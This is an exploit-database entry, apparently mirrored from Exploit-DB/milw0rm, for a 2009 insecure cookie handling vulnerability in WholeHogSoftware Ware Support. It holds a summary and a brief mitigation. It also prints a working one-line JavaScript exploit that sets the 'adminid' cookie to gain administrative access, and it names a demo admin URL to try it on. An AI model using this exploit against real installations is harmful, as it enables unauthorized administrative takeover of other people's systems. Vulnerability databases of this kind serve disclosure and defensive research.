header-logo
Suggest Exploit
vendor:
Ware Support
by:
Mountassif Moad
8.8
CVSS
HIGH
Insecure Cookie Handling
614
CWE
Product Name: Ware Support
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

WholeHogSoftware Ware Support Insecure Cookie Handling Vulnerability

WholeHogSoftware Ware Support is prone to an insecure cookie handling vulnerability. An attacker can exploit this issue to gain administrative access to the application. The attacker can exploit this issue by setting the 'adminid' cookie to '8'. This will grant the attacker administrative access to the application.

Mitigation:

Ensure that cookies are properly validated and sanitized before use.
Source

Exploit-DB raw data:

###########################################################################
[+] WholeHogSoftware Ware Support Insecure Cookie Handling Vulnerability
[+] Script   :Ware Support
[+] Site     :http://wholehogsoftware.com
[+] Detay    :http://wholehogsoftware.com/index.php/page/ware_support
[+] Discovered By Mountassif Moad   
              
[+] www.v4-team.com            
       
[+] Greetz : All my Freind
###########################################################################
Exploit:
javascript:document.cookie = "adminid=8; path=/";
DeMo :
http://www.wholehogsoftware.com/demo/support/admin/

# milw0rm.com [2009-02-03]

Navigation

Suggest Exploit

Services By CQR